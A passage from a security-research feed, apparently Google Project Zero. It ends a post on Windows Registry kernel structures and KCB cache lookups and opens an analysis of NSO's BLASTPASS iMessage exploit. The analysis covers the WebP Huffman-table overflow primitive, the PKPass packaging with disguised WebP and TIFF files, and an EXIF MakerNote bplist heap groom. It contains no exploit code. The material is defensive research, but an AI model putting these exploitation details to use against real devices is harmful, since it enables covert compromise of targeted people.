    | ffffe10d2dad4000 |    4da2000  | ffffe10d2da78000 |     3a6000    |  ffffe10d3489f000  | ffffe10d2d8ff000  | emRoot\System32\Config\SOFTWARE

    ...

    0: kd> !reg openkeys ffffe10d2dad4000

    ...

    Index 312:          86a158ea kcb=ffffe10d2d576a30 cell=000a58e8 f=00200000 \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION

    ...


    As we can see, our calculations have been proven to be accurate. We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVE object and the ConvKey for a given key, and then prints out information about the corresponding bucket.

    Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer. The subsequent elements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list. A diagram of this data structure is shown below:

    Diagram of the Windows Registry KCB cache structure. A pointer from the _CMHIVE structure references a _CM_KEY_HASH_TABLE_ENTRY array (hash table). Each entry/bucket in this array points to a singly-linked list of Key Control Blocks (KCBs). Within each KCB, the NextHash field points to the KeyHash structure of the subsequent KCB in the list, forming the chain.

    Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented. Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):

    1. Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.
    2. Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.
    3. Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:
    1. The hash of the key name.
    2. The pointer to the parent KCB.
    3. If both of the above match, perform a full comparison of the key name. If it matches, we have found the subkey.

    The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index.

    If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path.

    For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:

    • !reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.
    • !reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.
    • !reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.

    Other structures

    So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area. However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website. While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally.

    The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct. Even then, the correct meaning of each field and flag cannot be guaranteed. Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.

    Key opening/creation

    In PDB

    Structure name

    Description

    Parse context

    Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface.

    For example, the NtCreateKey syscall calls the CmCreateKey helper function. At this point, there are no further calls to Configuration Manager, but instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName). Several levels down, the kernel will transfer execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions). This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel. Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:

    • Pass the input configuration of a given operation, e.g. information about:
    • operation mode (open/create),
    • transactionality of the operation,
    • following of symbolic links,
    • flags related to WOW64 functionality,
    • optional class data of the created key.
    • Pass some return information, such as whether the key was opened or created,
    • Cache certain information within a single "parse" request, e.g.:
    • information on whether registry virtualization is enabled for a given process,
    • when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,
    • when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor).

    Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally.

    Path info

    When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them. This ensures that parsing only occurs once and doesn't need to be repeated. The structure where the result of this operation is stored is called "path info".

    According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting. Therefore, the path info structure allows for the storage of 32 elements, in the following way: the first 8 elements being present directly within the structure, and if the path is deeply nested, an additional 24 elements within a supplementary structure allocated on-demand from kernel pools. The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo.

    Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into a 24-element array. However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself. As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft. More information about this issue, as well as the reversed definition of this structure, can be found in my original report.

    Key notifications

    In PDB

    Structure name

    Description

    _CM_NOTIFY_BLOCK

    The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation:

    "This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters."

    The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes.

    Post block

    Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post.

    The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.

    Registry callbacks

    In PDB

    Structure name

    Description

    REG_*_INFORMATION

    These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface. Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft. A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page.

    However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives. If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended". Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys. At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts.

    Callback descriptor

    The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a double-linked list represented by the global CallbackListHead object.

    Object context descriptor

    A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead.

    Callback context

    An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process. For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks. These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list. This allows future requests for objects of this type to be quickly fulfilled.

    Registry virtualization

    In PDB

    Structure name

    Description

    Replication stack

    A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure. This occurs under the path HKU\<SID>_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions. The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages. First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function. This object specifies the precise key structure to be created within the virtualization process. Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.

    Transactions

    In PDB

    Structure name

    Description

    _KTRANSACTION

    A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction.

    Lightweight transaction object

    A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object.

    _CM_KCB_UOW

    The structure represents a single, active transactional operation linked to a specific key. In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type). In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent).

    This critical structure has multiple functions. The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase.

    _CM_UOW_*

    Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA.

    _CM_TRANS

    A descriptor of a specific registry transaction, usually associated with a particular hive. In special cases, if operations are performed on multiple hives within a single transaction, then multiple  _CM_TRANS objects may exist for it. Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command.

    _CM_RM

    A descriptor of a specific resource manager. It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag.

    Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive. The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable.

    Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command.

    _CM_INTENT_LOCK

    This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key. Given the object's address, WinDbg's !reg ixlock command can display some details about it.

    Serialized log records

    KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of unexpected shutdown during transaction commit. The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface. While the _CM_KCB_UOW structure can be found in public symbols, their corresponding serialized representations cannot. Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures.

    Rollback packet

    When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state. This is achieved using a structure that contains a list of transactions to be rolled back. This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback. Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.

    Differencing hives (VRegDriver)

    In PDB

    Structure name

    Description

    IOCTL input structures

    The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function. These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations. Each IOCTL requires a specific input data structure, none of which are officially documented. Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization. An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionally named VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4. This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw.

    Silo context

    This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function. It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes. A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, which is a set of source and target paths between which redirection should occur.

    Key context

    This structure stores the context specific to a particular key being subject to path translation within a silo. It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original path of the key before translation  as the client believes it has access to  and several other auxiliary fields.

    Callback context (open/create)

    The callback-specific context structure stores shared data between "pre" and "post" callbacks for a given operation. This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation. In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks. It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, to restore their original values in the "post" callback.

    Extra parameter

    This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback. This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process. Although the concept of a whole operation context seems broadly applicable, currently there is only one type of "extra parameter" being used, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.

    Layered keys

    In PDB

    Structure name

    Description

    _CM_KCB_LAYER_INFO

    This is likely the only structure related to layered keys whose definition is public. It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances. In practice, this means that it stores a pointer to the KCB at one level lower (its parent, so to speak), and the head of a linked list with KCBs at one level higher (KCB.LayerHeight+1), if any exist.

    Key node stack

    A stack containing all instances of a given layered key, starting from its level all the way down to level zero (the base key). Each key in this structure is represented by a (Hive, KeyCell) pair. If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure.

    Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure. This is because operations on layered keys usually require knowledge of the state of lower level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller.

    Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack".

    KCB stack

    This structure, analogous to the key node stack, represents keys using KCBs. Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it.

    Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary. This is likely due to the fact that most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios.

    Enum stack

    This data structure allows for the enumeration of subkeys within a given layered key. Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys. At an even higher level, this corresponds to the RegEnumKeyExW API function. The complexity of this structure is evident by the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it.

    Enum resume context

    This data structure, directly tied to the subkey enumeration, primarily serves as an optimization mechanism. After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack. This allows subsequent requests for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps. Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext.

    The KCB.SequenceNumber field, directly related to this structure, monitors whether a given key has significantly changed since a previous point in time. This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine if the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or if the entire process needs to be restarted.

    Value enum stack

    This data structure, used to enumerate values for layered keys, is similarly complex as those used to list subkeys. The main function utilizing it is CmEnumerateValueFromLayeredKey. Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure.

    Sorted value enum stack

    The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure. This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key.

    The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations. This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later version of Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack. This lends credibility to the hypothesis that these mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required.

    Subtree enumerator

    This structure enables the enumeration of both the direct subkeys of a layered key and all its deeper descendants. It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total). This mechanism is primarily needed to implement the "rename" operation on layered keys. First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3).

    Discard/replace context

    This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted. Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place. The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.

    Conclusion

    The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys. I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially relevant to the most recent code developments in Windows 10 and 11. I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future.

    This post concludes the part of the series focusing solely on the inner workings of the registry. In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!

    • ✇Project Zero
    • Blasting Past Webp Google Project Zero
      An analysis of the NSO BLASTPASS iMessage exploit Posted by Ian Beer, Google Project Zero On September 7, 2023 Apple issued an out-of-band security update for iOS: Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild": "[The target was] an individual employed by a Washington DC-based civil society organization with international offices... The ex
       

    Blasting Past Webp

    26 de Março de 2025, 14:30

    An analysis of the NSO BLASTPASS iMessage exploit

    Posted by Ian Beer, Google Project Zero

    On September 7, 2023 Apple issued an out-of-band security update for iOS:

    Release notes for iOS 16.6.1 and iPadOS 16.6.1, including CVE-2023-41064 for ImageIO and CVE-2023-41061 for Wallet, detailing security updates and potential exploitation.

    Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":

    "[The target was] an individual employed by a Washington DC-based civil society organization with international offices...

    The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.

    The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

    The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day.

    The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look...

    A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).

     

    Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know.

    In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts.

    This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:

    Setting the scene

    For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.

    WebP

    WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L.

    Lossless WebP makes extensive use of Huffman coding; there are at least 10 huffman trees present in the BLASTPASS sample. In the file they're stored as canonical huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail.

    With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees.

    As the Isosceles blog post points out, this means that a fundamental part of the vulnerability is that triggering the bug is detected, though after memory has been corrupted, and image parsing stops only a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops parsing any attacker-controlled data?

    The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer:

    // Huffman lookup table entry

    typedef struct {

      uint8_t bits;

      uint16_t value;

    } HuffmanCode;

    As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to a maximum value of 39 (0x27) and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it.

    There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this:

    Memory layout diagram showing Huffman tables at offset 0x3000 and the structure of a Huffman lookup table entry at offset 0x3058.

    To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.

    Déjà vu?

    Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment?

    Indeed.

    BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.

    Transformation

    In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data:

    Screenshot of WebP documentation explaining '4 Transforms' and their role in image compression.

    Screenshot of a table listing pixel prediction modes with corresponding formulas for calculating predicted values.

    My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.

    What's in a pass?

    Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received:

    171K sample.pkpass

    $ file sample.pkpass

    sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate

    There are five files inside the PKPass zip archive:

    60K  background.png

    5.5M logo.png

    175B manifest.json

    18B  pass.json

    3.3K signature

    The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp:

    $ file logo.png:

    logo.png:         RIFF (little-endian) data, Web/P image

    The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF.

    PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt.

    pass.json is just this:

    {"pass": "PKpass"}

    Finally background.png:

    $ file background.png

    background.png: TIFF image data, big-endian, direntries=15, height=16, bps=0, compression=deflate, PhotometricIntepretation=RGB, orientation=upper-left, width=48

    Curious. Another file with a misleading extension; this time a TIFF file with a .png extension.

    We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:

    Blastdoor

    So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs:

    The first, CVE-2023-41064 in ImageIO, is the WebP bug (though just to keep things confusing with a different CVE from the upstream WebP fix which is CVE-2023-4863 - they're the same vulnerability though).

    The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution".

    The Isosceles blog post hypothesises:

    "Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061."

    This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold.

    The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor.

    My guess is that CVE-2023-41061 is more likely referring to the lax parsing of PKPasses which didn't reject images which weren't png's.

    In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched.

    In those cases the WebP code was reached inside the MobileSMS process via a ChatKit CKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.

    What's in a WebP?

    I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk:

    EXIF : 0x586bb8

    exif is Intel byte alignment

    EXIF has n_entries=1

    tag=8769 fmt=4 n_components=1 data=1a

    subIFD has n_entries=1

    tag=927c fmt=7 n_components=586b8c data=2c

    It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc.

    It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that?

    Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c:

    Screenshot of a table listing EXIF tag definitions. The table includes columns for tag number, tag name, and description. The row for tag number 0x927C with the tag name 'MakerNote' is highlighted in red, with the description 'Manufacturer specific information'.

    It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information."

    Looking to Wikipedia for some clarification on what that actually is, we learn that

    "the "MakerNote" tag contains information normally in a proprietary binary format."

    Modifying the webp parser to now dump out the MakerNote tag we see:

    $ file sample.makernote

    sample.makernote: Apple binary property list

    Apple's chosen format for the "proprietary binary format" is binary plist!

    And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.

    unbplisting

    I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again.

    In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?

    Switching Views

    I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as python dictionaries before dumping them. Fixing the tools to instead keep lists of keys and values it became clear that there were duplicate keys. Lots of them:

    Screenshot of code showing a series of nested dictionary creations / duplicate keys

